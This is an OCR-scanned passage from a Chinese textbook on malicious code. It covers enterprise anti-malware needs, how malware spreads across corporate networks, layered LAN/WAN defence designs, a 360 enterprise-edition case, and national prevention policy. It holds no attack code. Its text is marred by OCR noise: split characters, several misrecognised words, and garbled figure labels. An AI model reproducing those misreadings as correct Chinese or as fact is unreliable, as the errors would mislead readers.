装 、 集 中 管理 .统一 防范 策略 成 为 企业 级 恶意 代码 防范 产品 的 重要 功能 。 

目前 ,大 型 企业 网 络 系 统 的 恶意 代码 防范 工作 已 不 再 是 简单 的 、 针 对 单 台 计算 机 的 检测 
及 清除 ,不 仅 需 要 建立 多 层次 的 、 立 体 的 恶意 代码 防护 体系 ,而 且 要 具备 完善 的 管理 系统 来 
设置 和 维护 恶意 代码 防护 策略 。 多 层次 的 防护 体系 是 指 在 企业 的 每 个 台式 机 上 安装 基于 台 
式 机 的 恶意 代码 防范 软件 ,在 服务 器 上 安装 基于 服务 器 的 恶意 代码 防范 软件 ,在 Internet 网 
关上 安装 基于 Internet 网 关 的 恶意 代码 防范 软件 。 因 为 对 企业 网 络 系统 来 说 ,防止 恶意 代 
码 的 攻击 并 不 是 保护 某 一 台 服 务 器 或 台式 机 ,而 是 从 工作 站 到 服务 器 再 到 网 关 的 全 面 保护 ， 
这 样 才能 保证 整个 企业 网 不 受 恶 意 代 码 的 侵害 。 

在 大 型 跨 地 区 的 企业 广域网 内 ,要 保证 整个 广域网 安全 无 毒 ,首先 要 保证 每 一 个 局 域 网 
的 安全 无 毒 。 也 就 是 说 ,一 个 企业 网 的 恶意 代码 防范 体系 是 建立 在 每 个 局 域 网 的 防范 系统 
上 的 。 应 该 根据 每 个 局 域 网 的 防护 要 求 , 建 立 局 域 网 恶意 代码 防范 控制 系统 ,分 别 设置 有 针 
对 性 的 防范 策略 。 从 总 部 到 分 支 机 构 , 由 上 到 下 ,各 个 局 域 网 的 防范 系统 相 结 合 ,最 终 形成 
一 个 立体 的 、 完 整 的 广域网 恶意 代码 防护 体系 。 


11.4.1 企业 恶意 代码 防范 需求 


制定 恶意 代码 防范 方案 的 第 一 步 是 弄 清 楚 企 业 的 实际 需求 。 面 对 来 势 测 测 的 恶意 代 
码 ,企业 的 系统 管理 员 必 须 对 系统 现 有 防毒 功能 有 清晰 地 认识 和 判断 ,必须 明确 新 方案 的 目 
标 ,并 且 清 楚 需要 什么 样 的 产品 才能 实现 这 个 目标 。 

1. 企业 自身 评估 

只 有 在 系统 管理 员 对 自己 管理 的 系统 安全 程度 充分 理解 后 ,才能 设计 出 防止 恶意 代码 
破坏 的 最 佳 方案 ,承担 系统 安全 重任 。 其 实 , 对 于 一 台独 立 的 计算 机 而 言 ,恶意 代码 防范 软 
件 应 该 是 第 一 个 必须 安装 的 应 用 软件 。 对 于 一 个 网 络 系统 ,建立 先进 的 全 方位 恶意 代码 防 
范 方 案 是 系统 安全 的 重要 保证 。 在 制定 企业 恶意 代码 防治 方案 以 前 ,企业 系统 管理 员 应 该 
重点 考虑 以 下 几 个 问题 。 

(1) 哪些 计算 机 正在 运行 实时 性 的 防范 软件 ? 

(2) 如 何 更 新 恶意 代码 的 特征 码 ? 

(3) 哪些 计算 机 没有 运行 恶意 代码 防范 软件 ? 

(4) 现 有 的 防范 软件 效果 和 功能 是 否 能 保证 系统 的 安全 ? 

(5) 过 去 是 否 曾 遭 受 恶意 代码 的 侵害 ? 

(6) 谁 负责 处 理 用 户 恶意 代码 问题 ? 

(7) 用 人 工 处 理 一 次 恶意 代码 危机 的 费用 是 多 少 ? 

(8) 计算 机 系统 停机 一 天 的 损失 是 多 少 ? 

(9) 恶意 代码 发 作 能 否 导致 系统 瘫痪 ? 

(10) 如 果 系 统 瘫 痪 或 重要 数据 丢失 ,恢复 的 费用 有 多 高 ? 

2. 影响 因素 

完善 的 企业 网 络 防毒 解决 方案 ,除了 防 病毒 软件 的 强大 功能 之 外 ,还 有 下 列 几 个 重要 的 
问题 需要 非常 严谨 的 考虑 。 
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(1) 在 每 台 机 器 都 安装 防 病毒 软件 ,很 麻烦 且 费 时 费力 。 

(2) 大 批 计算 机 的 恶意 代码 特征 码 需 要 更 新 ,这 需要 专人 管理 。 

(3) 一 般 行 政 人 员 或 不 太 了 解 计算 机 的 人 员 是 否 可 以 轻松 使 用 ,简捷 更 新 和 升级 ? 

(4) 并 不 是 每 个 使 用 者 都 知道 如 何 对 恶意 代码 防范 软件 的 一 些 功 能 选项 进行 设置 , 需 
要 用 简单 的 方式 一 次 性 设 定 , 甚 至 要 完全 自动 化 。 

(5) 标准 预 设 的 防毒 选项 设置 不 一 定 适用 所 有 的 工作 站 。 

(6) 很 难 分 析 统计 恶意 代码 攻击 事件 的 次 数 、 原 因 及 来 源 。 

(7) 用 户 可 能 会 随意 更 改 防 范 策略 和 选项 设置 ,或 者 忘记 更 新 最 新 的 恶意 代码 特征 码 
和 扫描 引擎 ,甚至 印 载 恶意 代码 防范 软件 。 

(8) 移动 用 户 太 多 ,无 法 有 效 、 及 时 地 掌握 和 把 最 新 的 恶意 代码 特征 码 送 到 移动 用 户 
手中 。 

(9) 是 否 能 够 很 方便 地 在 多 种 平台 下 进行 软件 安装 ,维护 和 升级 。 

(10) 是 否 可 以 对 网 络 进 行 全 方位 、 多 层次 的 预防 和 过 滤 。 

3. 对 恶意 代码 防范 产品 的 要 求 

针对 上 述 问题 ,建议 在 评估 和 购买 防毒 软件 时 考虑 以 下 几 个 因素 。 

(1) 多 层次 ,全 方位 的 恶意 代码 防范 工作 环境 。 

(2) 先进 的 恶意 代码 防范 技术 。 

(3) 简易 快速 的 网 络 恶 意 代码 防范 软件 安装 和 维护 。 

(4) 集中 和 方便 地 进行 恶意 代码 特征 码 和 扫描 引擎 的 更 新 。 

(5) 方便 、 全 面 \ 友 好 的 恶意 代码 警报 和 报表 系统 管理 机 制 。 

(6) 恶意 代码 防护 自动 化 服务 机 制 。 

(7) 客户 端 防范 策略 的 强制 定义 和 执行 。 

(8) 快速 有 效 地 处 理 未 知 恶意 代码 。 

(9) 合理 的 预算 规划 和 低廉 的 成 本 。 

(10) 良好 的 服务 与 强大 支持 。 


11.4.2 企业 网 络 的 典型 结构 


现代 化 企业 的 计算 机 网 络 是 在 一 定 的 硬件 设备 系统 构架 下 对 各 种 信息 进行 收集 、 处 理 
和 汇总 的 综合 应 用 体系 。 大 多 数 的 企业 网 络 都 具有 大 致 相似 的 体系 结构 ,这 种 体系 结构 的 
相似 性 表现 在 网 络 的 底层 基本 协议 构架 .操作 系统 .通信 协议 及 高 层 企业 业 务 应 用 上 ,这 为 
通用 的 企业 网 络 恶 意 代码 防范 软件 提供 了 某 种 程度 上 的 参考 。 

从 网 络 基本 结构 上 看 ,一 个 典型 的 企业 网 络 包括 网 关 、 服 务 器 和 客户 端 。 尽 管 不 同 的 企 
业 可 能 选择 千差万别 的 联网 设备 ,但 基本 都 是 基于 IEEE 802.2 和 802. 3 规范 以 太 网 结构 。 
事实 证 明 , 这 是 一 种 成 熟 、 经 济 的 网 络 方 案 。 企 业内 部 网 和 互联 网 通过 网 关连 接 在 一 起 。 企 
业内 部 网 目前 应 用 最 多 的 是 一 种 交换 到 桌面 的 100M/1000M 快速 以 太 网 ,此 外 ,无 线 网 络 
也 越 来 越 成 为 一 种 流行 趋势 。 典 型 的 企业 网 络 基本 结构 如 图 11-1 所 示 。 

从 网 络 的 应 用 模式 上 看 ,现代 企业 网 络 都 是 基于 C/S 的 计算 模式 ,由 服务 器 来 处 理 关 
键 性 的 业务 逻辑 和 企业 核心 业务 数据 ,客户 机 处 理 用 户 界 面 及 与 用 户 的 直接 交互 。 服 务 器 
是 网 络 的 中 枢 和 信息 化 核心 ,具有 吞吐 能 力 强 存储 容量 大 和 网 络 管理 能 力 强 等 特点 。 客 户 
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图 11-1 典型 的 企业 网 络 基 本 结构 示意 图 


机 的 硬件 没有 特殊 的 要 求 ,一 般 普通 PC 就 可 以 胜任 。 企 业 网 络 往 往 有 一 台 或 多 台 主 要 的 
业务 服务 器 ,在 此 之 下 分 布 着 众多 客户 机 或 工作 站 ,以 及 不 同 的 应 用 服务 器 。 根 据 不 同 的 任 
务 和 功能 服务 ,典型 的 服务 器 应 用 类 型 有 文件 服务 器 、 邮 件 服务 器 、Web 服务器、 数据 库 服 
务 器 和 应 用 服务 器 等 。 

从 操作 系统 上 看 ,企业 网 络 的 客户 端 基本 上 都 是 Windows 平台 ,中 小 企业 服务 器 一 般 
采用 Windows 系统 ,部 分 行业 用 户 或 大 型 企业 的 关键 业务 应 用 服务 器 采用 UNIX 系统 。 
Windows 平台 的 特点 是 价格 比较 便宜 ,具有 良好 的 图 形 用 户 界面 ; 而 UNIX 系统 的 稳定 性 
和 大 数据 量 可 靠 处 理 能 力 使 得 它 更 适合 于 关键 性 业务 应 用 。 

从 通信 协议 上 看 ,企业 网 络 绝 大 部 分 采用 TCP/IP 协议 。TCP/IP 本 来 是 一 种 Internet 
的 通信 协议 ,但 是 因为 主流 操作 系统 和 绝 大 部 分 应 用 软件 的 支持 及 它 本 身 的 发 展 ,已 经 使 得 
它 足 以 承担 从 企业 内 网 到 Internet 的 主要 通信 重任 。 此 外 ,在 企业 内 网 上 常见 的 协议 包括 
NetBIOS、IPX/SPX 等 。 


11.4.3 企业 网 络 的 典型 应 用 


企业 网 络 的 主要 应 用 包括 文件 共享 .打印 服务 共享 ,办公 自动 化 (OA) 系 统 、 企 业 信息 
管理 系统 (MIS) .Internet 应 用 等 。 

文件 和 打印 共享 是 企业 建 网 的 最 初 目的 ,也 是 计算 机 网 络 的 最 基本 应 用 。 有 了 网 络 , 文 
件 再 也 不 用 通过 磁盘 来 传递 ,大 文件 的 交换 、 应 用 程序 共享 等 也 更 加 方便 ,具有 权限 的 用 户 
可 以 在 自己 的 计算 机 上 使 用 共享 的 打印 机 。 

企业 网 络 应 用 达到 了 一 定 的 层次 ,就 需要 一 种 更 加 方便 的 内 部 通信 和 消息 传递 机 制 ,以 
及 工作 流程 的 协同 工作 机 制 , 于 是 就 产生 了 办 公 自 动 化 系统 。OA 系统 可 以 实现 办 公信 息 
规范 化 和 一 致 化 ,能 够 将 所 有 的 办 公文 档 汇集 在 一 起 ,方便 进行 统计 和 查找 ,并 按照 不 同 的 
权限 设置 在 企业 成 员 之 间 共 享 。 目 前 的 OA 系统 大 都 建立 在 一 个 称 为 群 件 的 软件 平台 上 ， 
最 流行 的 群 件 系统 有 IBM 的 Lotus Domino/Notes 系统 及 微软 的 Exchange/OutLook 
系统 。 

企业 管理 信息 系统 能 对 企业 的 各 种 信息 进行 收集 、 分 析 、 存 储 \ 传 输 和 维护 ,并 为 企业 管 
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MIS 和 OA 系统 进行 业务 数据 管理 和 工作 流程 管理 ,这 些 系统 都 充分 地 利用 了 网 络 的 
数据 交换 特征 ,大 量 的 文档 、 结 构 化 或 非 结构 化 的 业务 数据 通过 网 络 来 传输 和 处 理 。 这 种 频 
繁 和 大 规模 的 文件 ,数据 交换 也 为 恶意 代码 通过 网 络 传播 打开 了 便利 之 门 。 

企业 Internet 应 用 包括 企业 需要 收发 Internet 邮件 ,浏览 外 部 网 页 ,发布 企业 信息 等 功 
能 。 所 有 这 些 都 需要 企业 内 部 网 络 与 Internet 之 间 连 接 的 畅通 无 阻 。 畅 通 的 Internet 连接 
使 得 企业 方便 地 获取 和 发 布 信息 的 同时 ,也 为 恶意 代码 的 乘虚 而 人 创造 了 条 件 。 

总 之 ,企业 应 用 需要 网 络 的 便利 信息 交换 特性 ,恶意 代码 也 可 以 充分 利用 网 络 的 特性 来 
达到 它 的 传播 目的 。 企 业 在 充分 地 利用 网 络 进行 业务 处 理 时 ,就 不 得 不 考虑 企业 的 恶意 代 
码 防范 问题 ,以 保证 关系 企业 命运 的 业务 数据 完整 且 不 被 破坏 。 


11.4.4 恶意 代码 在 网 络 上 传播 的 过 程 


目前 ,互联 网 已 经 成 为 恶意 代码 传播 最 大 的 来 源 ,电子 邮件 和 网 络 信息 传递 为 恶意 代码 
传播 打开 了 高 速 的 通道 。 企 业 网 络 化 的 发 展 也 有 助 于 恶意 代码 的 传播 速度 大 大 提高 ,感染 
的 范围 也 越 来 越 广 。 可 以 说 ,网 络 化 促进 了 恶意 代码 的 传染 效率 ,而 恶意 代码 传染 的 高 效率 
也 对 防范 产品 提出 了 新 的 要 求 。 

近 几 年 ,全 球 的 企业 网 络 经 历 了 网 络 恶 意 代码 的 不 断 侵袭 ,如 爱 虫 、 灰 蚀 子 、 尼 姆 达 等 ， 
可 以 算是 大 名 易 易 了 。 这 些 恶 意 代 码 几 乎 一 夜 之 间 让 世界 为 之 震惊 ,唤醒 了 人 们 对 于 网 络 
防毒 的 重视 。 

网 络 恶意 代码 在 企业 网 络 内 部 之 所 以 能 够 快速 而 广泛 传播 ,是 因为 它们 充分 利用 了 网 
络 的 特点 。 根 据 使 用 条 件 和 环境 的 不 同 ,企业 网 络 上 恶意 代码 的 传播 过 程 大 致 如 图 11-2 
所 示 。 
| 文件 服务 器 


图 11-2 恶意 代码 在 企业 网 上 的 传播 过 程 


图 中 虚线 1? 表示 互联 网 上 的 恶意 代码 经 过 防火 墙 ` 网 关 到 达 邮 件 服务 器 ,这 样 邮件 服 
务 器 就 染 毒 了 。 虚 线 “2” 表 示 某 一 个 用 户 使 用 邮件 服务 器 从 而 染 毒 。 经 过 虚线 “3”, 恶 意 代 
码 扩 散 到 文件 服务 器 上 。 虚 线 “4” 表 示 通 过 资源 共享 ,文件 服务 器 感染 了 客户 端 。 虚线“5” 
表示 客户 端 之 间 的 交叉 感染 。 

根据 恶意 代码 在 企业 网 中 的 传播 过 程 ,可 以 归纳 出 恶意 代码 在 企业 网 中 的 几 种 传播 
途径 。 
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(1) 互联 网 。 网 络 上 有 些 计算 机 具有 连接 互联 网 的 功能 ,而 互联 网 上 有 许多 可 供 下 载 
的 程序 .文件 信息。 另外 ,收发 E-mail 也 必须 通过 互联 网 。 这 些 都 是 恶意 代码 进入 企业 内 
部 网 络 的 人口 。 

(2) 网 络 共享 。 当 使 用 网 上 服务 器 或 其 他 计算 机 上 带 恶 意 代码 的 共享 文件 或 开机 时 使 
用 了 服务 器 中 带 毒 的 引导 文件 时 ,网 络 用 户 计算 机 系统 就 可 能 被 感染 恶意 代码 ,也 可 能 将 恶 
意 代码 感染 到 其 他 计算 机 中 共享 目录 下 的 文件 。 如 果 服 务 器 本 身 已 感染 了 恶意 代码 , 则 连 
在 网 上 的 计算 机 在 共享 服务 器 资源 和 操作 时 ,很 容易 引起 交叉 感染 。 

(3) 客户 端 。 如 果 某 个 客户 端 不 小 心 感染 了 经 过 其 他 途径 (移动 硬盘 、 光 盘 等 ) 传 染 的 
恶意 代码 ,就 很 容易 导致 网 络 内 部 交叉 感染 。 

由 以 上 恶意 代码 在 网 络 上 的 传播 方式 可 以 看 出 ,在 网 络 环境 下 ,恶意 代码 除了 具有 可 传 
播 性 、 可 执行 性 、 破 坏 性 、 可 触发 性 等 恶意 代码 的 共性 外 ,还 具有 感染 速度 快 .扩散 面 广 , 传 播 
形式 复杂 多 样 ,难以 彻底 清除 .破坏 性 大 等 新 的 特点 。 由 此 可 见 , 基 于 网 络 的 整体 解决 方案 
势 在 必 行 。 


11.4.5 企业 网 络 恶 意 代 码 防 范 方案 


魔 高 一 尺 , 道 高 一 丈 , 随 着 恶意 代码 的 不 断 发 展 ,安全 厂商 研发 出 不 同 的 防 病毒 安全 产 
品 予 以 应 对 ,从 传统 单机 恶意 代码 防范 跨越 到 网 络 级 的 恶意 代码 防范 ,从 单纯 多 机 防护 到 定 
点 网 关 杀 毒 , 防 范 模式 有 很 大 发 展 ,逐渐 走向 多 样 化 。 一 般 而 言 ,用 户 服务 器 、 客 户 端 的 分 布 
往往 集中 在 总 部 、 分 支 机 构 ,网 络 具有 相应 规模 的 同时 ,也 给 恶意 代码 带 来 了 相应 的 传播 空 
间 ,一 旦 一 点 或 多 点 感染 恶意 代码 ,就 很 可 能 造成 整个 网 络 爆发 恶意 代码 。 

1. 局 域 网 恶意 代码 防范 方案 

从 整体 上 来 讲 ,局 域 网 服务 器 必须 根据 其 所 采用 的 网 络 操作 系统 (如 UNIX/Linux、 
DOS、Windows \iOS 等 操作 系统 平台 ) 配 备 相 应 恶意 代码 防范 软件 ,全 方位 地 防范 恶意 代码 
的 入侵。 

如 图 11-3 所 示 ,在 规模 局 域 网 内 ,还 要 配备 网 络 管理 平台 。 例 如 ,在 网 管 中 心 可 以 配备 
恶意 代码 集中 监控 中 心 ,可 以 做 到 对 整个 网 络 的 恶意 代码 疫情 进行 集中 管理 ,在 各 分 支 网 络 
也 配备 监控 中 心 , 以 提供 整体 防范 策略 配置 ,恶意 代码 集中 监控 ,灾难 恢复 等 管理 功能 。 另 
外 ,工作 站 、 服 务 器 较 多 的 网 络 可 配备 软件 自动 分 发 中 心 ,以 减轻 网 络 管理 人 员 的 工作 量 。 

2. 广域网 络 恶 意 代码 防范 方案 

广域网 恶意 代码 防御 策略 是 基于 “单机 杀毒 一 局 域 网 集中 监控 一 广域网 总 部 管理 ”三 级 
管理 模式 的 ,如 图 11-4 所 示 。 

此 外 ,还 可 以 在 局 域 网 恶意 代码 防御 的 基础 上 构建 广域网 总 部 恶意 代码 报警 查看 系统 ， 
该 系统 在 监控 本 地 、 远 程 异地 局 域 网 恶意 代码 防御 情况 的 同时 ,还 以 整个 集团 网 络 的 恶意 代 
码 爆发 种 类 发生 频 度 、 易 发 生源 等 信息 做 统计 分 析 。 

3. 某 企 业 恶意 代码 防范 应 用 案例 

与 个 人 计算 机 安全 不 同 , 企 业 用 户 的 计算 机 安全 属于 集体 安全 范畴 ,涉及 内 网 管理 , 风 
险 控制 ,流量 监测 和 商业 机 密 保 护 等 多 个 方面 。 联 入 内 网 系统 的 计算 机 中 ,只 要 有 一 台 计 算 
机 被 黑客 攻破 ,就 有 可 能 造成 内 网 安全 体系 的 崩 演 和 商业 机 密 的 泄露 。 


计算 机 病毒 与 恶意 代码 一 原理、 技术 及 防范 (第 4 版 ) 


300 
互联 网 
反 病毒 厂 
商 服务 器 
“@ 
反 病 毒 控 ES 
制 平台 防火 寺 | 
反 病 毒 控 制 加 多 
软件 Web 服 务 器 ”FTP 服 务 器 


Notes 服 务 器 UNIX 服 务 器 文件 服务 器 cf 工作 Windows 服 务 器 
Notes 版 UNIX 版 。 Novell 版 Windows 工 作 ”Windows 服 务 
杀毒 杀毒 杀毒 站 版 杀毒 器 版 杀毒 


图 11-3 局 域 网 恶意 代码 防御 结构 图 


网 络 信息 中 心 


升级 服务 器 _ 
策略 服务 其 要 网 阁 


2 GE 
反 病毒 控制 中 心 9 反 病 毒 控制 中 心 ”二 级 网 络 
集中 管理 集中 管理 _ 
病毒 预警 “un 病毒 预警 :三 级 网 络 
上 所 信息 上 报信 息 


图 11-4 多 级 恶意 代码 安全 管理 结构 图 


为 此 360 推出 360 企业 版 ,让 广大 企业 能 够 轻松 管理 企业 安全 。 特 别 是 针对 与 互联 网 
隔离 的 企业 ,360 给 出 了 专门 的 解决 方案 ,如 图 11-5 所 示 。 这 种 企业 规模 一 般 , 终 端 数 从 几 
十 台 到 几 百 台 不 等 ,网 络 管理 情况 比较 严格 ,不 允许 终端 连接 互联 网 。 所 有 终端 都 集中 在 一 


个 局 域 网 内 ,有 专门 的 网 络 管理 员 或 安全 管理 员 。 
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在 企业 内 部 部 署 控制 中 心 和 企业 版 终端 ,企业 版 终端 根据 控制 中 心 制定 的 安全 策略 , 进 
行 体检 、 杀 毒 和 修复 漏洞 等 安全 操作 。 

使 用 隔离 网 工具 ,定期 从 360 相关 的 服务 器 下 载 病毒 库 、 木 马 库 .漏洞 补丁 文件 等 ,更 新 
到 控制 中 心 后 ,所 有 企业 终端 都 可 以 自动 升级 和 修复 漏洞 。 

有 专人 负责 控制 中 心 的 日 常 运行 ,定时 查看 各 终端 的 安全 情况 ,下 发 统一 杀毒 、 漏 洞 修 
复 等 策略 。 


企业 终端 


区 360 升 级 服务 器 
| 下 载 数据 

统一 管理 D &y | 更 新 数据 

从 


企业 和 8 体检 /杀毒 打 补丁 控制 中 必 


图 11-5 隔离 网 环境 下 的 企业 解决 方案 


11.5 习 题 


和 是 形成 反 病毒 产品 地 缘 性 的 主要 原因 。 


二 、 思 考题 

1. 如 果 你 是 一 个 单位 的 信息 安全 工程 师 , 你 将 如 何 为 工作 单位 选择 一 个 防 病毒 产品 ? 

2. 结合 所 学 知识 ,给 出 一 个 大 型 企 事业 单位 (具有 多 层 分 支 机 构 的 单位 ) 的 计算 机 病毒 
防范 方案 。 

3. 作为 一 款 成 熟 的 商业 杀毒 软件 ,应 该 具备 什么 样 的 功能 ? 
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就 目前 的 计算 机 技术 而 言 ,可 以 肯定 地 说 :“ 不 存在 能 够 防治 未 来 所 有 恶意 代码 的 软 、 
硬件 .” 因 此 ,恶意 代码 产生 在 前 ,防范 手段 相对 滞后 ?将 是 一 个 长 期 的 过 程 。 在 这 个 长 期 的 
过 程 中 ,如 何 有 效 利用 现 有 技术 使 系统 免 受 或 少 受 破坏 将 是 恶意 代码 防治 的 核心 工作 。 

在 网 络 迅速 发 展 的 今天 ,基于 单机 的 防范 方案 已 经 不 能 适应 时 代 的 需要 ,于 是 人 们 推出 
了 基于 网 络 环境 的 整体 解决 方案 。 在 新 型 的 防范 方案 下 ,简单 的 软件 “使 用 方法 ”和 “注意 事 
项 "已 经 不 能 提供 系统 的 、 利 于 用 户 使 用 的 整体 思路 。 于 是 ,恶意 代码 防治 策略 这 一 概念 被 
适时 地 提出 。 恶 意 代码 防治 策略 是 恶意 代码 防护 工作 的 一 个 必要 部 分 , 它 能 帮助 用 户 从 理 
论 的 高 度 认识 防护 工作 的 重要 性 ,并 进一步 指导 用 户 的 防治 工作 。 

本 章 侧 重 于 介绍 恶意 代码 防治 的 全 局 策略 和 规章 ,包括 如 何 制订 防御 计划 ,如 何 挑 选 一 
个 快速 反应 小 组 ,如 何 控 制 恶 意 代码 的 发 作 , 以 及 防范 工具 的 选择 等 。 

本 章 学 习 目 标 

(1) 掌握 恶意 代码 防治 的 基本 准则 。 

(2) 掌握 单机 用 户 防治 策略 。 

(3) 掌握 企业 级 用 户 防治 策略 。 

(4) 了 解 恶 意 代码 未 来 防治 措施 。 

(5) 了 解 恶意 代码 相关 法 律 法 规 。 


12.1 恶意 代码 防治 策略 的 基本 准则 


从 恶意 代码 对 抗 的 角度 来 看 ,其 防治 策略 必须 具备 下 列 准则 。 

(1) 拒绝 访问 能 力 。 来 历 不 明 的 软件 是 恶意 代码 的 重要 载体 。 各 种 不 明 来 历 的 软件 ， 
尤其 是 通过 网 络 传 过 来 的 软件 ,不 得 进入 计算 机 系统 。 

(2) 检测 能 力 。 恶 意 代 码 总 是 有 机 会 进入 系统 ,因此 ,系统 中 应 设置 检测 恶意 代码 的 机 
制 来 阻止 外 来 恶意 代码 的 侵犯 。 除 了 检测 已 知 的 恶意 代码 外 ,能 否 检测 未 知 恶 意 代码 (包括 
已 知行 为 模式 的 未 知 恶 意 代码 和 未 知行 为 模式 的 未 知 恶 意 代码 ) 也 是 一 个 衡量 恶意 代码 检 
测 能 力 的 重要 指标 。 

(3) 控制 传播 的 能 力 。 亚 意 代 码 防治 的 历史 证 明 , 迄 今 还 没有 一 种 方法 能 检测 出 所 有 
的 恶意 代码 ,更 没有 一 种 方法 能 检测 出 所 有 未 知 恶意 代码 ,因此 ,被 恶意 代码 感染 将 是 一 个 
必然 事件 。 关 键 是 ,即使 恶意 代码 进入 系统 ,也 可 以 及 时 阻止 恶意 代码 在 系统 中 任意 传播 。 
因此 ,一 个 健全 的 信息 系统 必须 要 有 控制 恶意 代码 传播 的 能 力 。 

(4) 清除 能 力 。 如 果 恶 意 代 码 突破 了 系统 的 防护 ,即使 它 的 传播 受到 了 控制 ,但 也 要 有 
相应 的 措施 将 它 清除 掉 。 对 于 已 知 恶 意 代 码 , 可 以 使 用 专用 恶意 代码 清除 软件 。 对 于 未 知 
类 恶意 代码 ,在 发 现 后 使 用 软件 工具 对 它 进行 分 析 , 尽 快 编写 出 清除 软件 。 当 然 ,如 果 有 后 
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备 文件 ,也 可 使 用 它 直接 覆盖 被 感染 文件 。 

(5) 恢复 能 力 。“ 在 恶意 代码 被 清除 以 前 ,就 已 经 破坏 了 系统 中 的 数据 ”, 这 是 非常 可 怕 
但 又 非常 可 能 发 生 的 事件 。 因 此 ,信息 系统 应 提供 一 种 高 效 的 方法 来 恢复 这 些 数据 ,使 数据 
损失 尽量 减 到 最 少 。 

(6) 替代 操作 。 当 发 生 问题 时 ,手头 没有 可 用 的 技术 来 解决 问题 ,但 是 任务 又 必须 继续 
执行 下 去 。 为 了 解决 这 种 窒 况 ,系统 应 该 提供 一 种 蔡 代 操作 方案 : 在 系统 未 恢复 前 用 替代 
系统 工作 ,等 问题 解决 以 后 再 换 回 来 。 


12.2 国家 层面 上 的 防治 策略 


我 国 的 恶意 代码 疫情 呈现 出 两 种 趋势 : 一 种 趋势 是 国外 流行 的 网 络 化 恶意 代码 大 肆 侵 
袭 我 国 的 计算 机 网 络 ; 另 一 种 趋势 是 出 现 大 量 本 土 恶意 代码 ,并 且 传 播 能 力 和 破坏 性 越 来 
越 强 。 针 对 目前 日 益 增 多 的 恶意 代码 ,根据 所 掌握 的 恶意 代码 的 特点 和 未 来 发 展 趋势 ,在 此 
给 出 国家 层面 上 的 恶意 代码 防治 策略 建议 。 

1. 完善 相关 法 律 法 规 及 其 贯彻 落实 工作 

我 国 现行 (刑法 ) 第 286 条 关于 破坏 计算 机 信息 系统 罪 的 相关 规定 : 违反 国家 规定 ,对 
计算 机 信息 系统 功能 进行 删除 ,修改 、 增 加 ,干扰 ,造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 
严重 的 ,处 五 年 以 下 有 期 徒刑 或 者 拘役 ; 后 果 特 别 严重 的 ,处 五 年 以 上 有 期 徒刑 。 故 意 制 
作 、 传 播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 依照 以 上 的 规定 
处 罚 。 公 安 部 于 2000 年 颁布 实施 了 更 加 具体 的 《计算 机 病毒 防治 管理 办 法 》。 各 单位 应 依 
据 相 关 规 定 ,结合 各 自 的 情况 建立 恶意 代码 防治 制度 和 相应 组 织 , 将 恶意 代码 防治 工作 落 到 

2. 在 各 主干 网 络 建立 恶意 代码 预警 系统 

在 我 国 主干 网 络 和 电子 政府 ,金融 、 证 券 .税务 等 专用 网 络 中 建立 恶意 代码 预警 系统 。 
监控 整个 网 络 的 恶意 代码 实时 疫情 ,及 时 发 现 、 捕 获 已 有 的 恶意 代码 和 新 出 现 的 恶意 代码 ， 
便于 及 早 研 究 应 对 测量 ,避免 恶意 代码 大 面积 传播 造成 的 破坏 。 

3. 建立 多 层次 恶意 代码 应 急 体系 

针对 恶意 代码 突 发 性 强 涉及 范围 广 和 破坏 力 高 的 特点 ,为 了 有 效 降低 其 危害 ,提高 人 
们 对 恶意 代码 的 防治 能 力 , 应 分 级 建立 快速 有 效 的 恶意 代码 应 急 体系 。 各 单位 应 设立 专门 
的 恶意 代码 防治 小 组 ,与 当地 公安 机 关 建 立 的 应 急 机 构 和 国家 的 恶意 代码 应 急 体系 建立 信 
息 交 流 机 制 ,负责 预防 和 疫情 上 报 工作 。 在 疫情 呈 规 模 性 爆发 时 ,根据 国家 恶意 代码 应 急 处 
理 中 心 发 布 的 恶意 代码 疫情 公告 ,及 时 做 好 应 对 措施 ,以 减少 恶意 代码 造成 的 危害 。 

4. 建立 动态 的 系统 风险 评估 措施 

根据 系统 和 业务 特点 ,进行 恶意 代码 风险 评估 。 通 过 评估 了 解 它们 面临 的 恶意 代码 威胁 
有 哪些 ,并 清楚 哪些 风险 必须 防范 .哪些 风险 可 以 承受 。 确 定 所 能 承受 的 最 大 风险 ,以 便 制 定 
相应 的 防治 策略 和 技术 防范 措施 ,并 制订 灾难 恢复 计划 。 同 时 ,根据 恶意 代码 出 现 的 新 变化 ， 
适时 地 对 系统 进行 动态 安全 评估 。 了 解 当前 面临 的 主要 风险 ,评估 防护 策略 的 有 效 性 。 


304 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版) 


5. 建立 恶意 代码 事故 分 析 制 度 

恶意 代码 疫情 发 生 后 ,要 认真 分 析 原 因 , 找 到 恶意 代码 破坏 防护 系统 的 突破 口 ,及 时 修 
改 恶 意 代 码 防 治 策略 ,并 对 调整 后 的 恶意 代码 防治 策略 进行 重新 评估 。 

6. 制订 完备 的 备份 和 恢复 计划 

为 了 应 对 恶性 的 恶意 代码 人 侵 事件 ,应 具备 完善 的 备份 和 恢复 计划 ,甚至 灾难 恢复 计 
划 。 备 份 和 恢复 计划 能 够 将 恶意 代码 造成 的 损失 减少 到 最 低 ,并 尽快 恢复 系统 的 正常 工作 。 

7. 提高 国内 运营 商 自 身 的 安全 性 

近年 来 ,起 源 于 我 国 的 网 络 恶意 代码 数量 呈 上 升 趋势 ,这 些 恶 意 代 码 常常 利用 国内 网 络 
服务 的 安全 漏洞 大 肆 传 播 。 因 此 ,需要 运营 商 安 装 使 用 网 络 级 的 恶意 代码 防范 系统 ,加 强 用 
户 的 身份 认证 工作 ,与 国家 恶意 代码 应 急 处 理 中 心 建立 联动 机 制 , 及 时 发 现 恶 意 代 码 , 并 采 
取 措 施 , 从 根本 上 阻 断 恶 意 代 码 的 传播 途径 。 

8. 加 强 信息 安全 培训 

恶意 代码 的 技术 和 手段 日 新 月 异 , 因 此 ,急需 建立 一 套 安全 培训 课程 ,提高 技术 人 员 的 
恶意 代码 防范 能 力 。 

9. 加 强 技术 防范 措施 

管理 措施 固然 重要 ,但 是 ,技术 防范 措施 仍然 是 恶意 代码 防治 工作 的 核心 内 容 。 根 据 前 
面 章 节 的 内 容 及 恶意 代码 防治 的 经 验 , 本 章 将 给 出 恶意 代码 的 技术 防范 措施 。 


12.3 单机 用 户 防 治 策略 


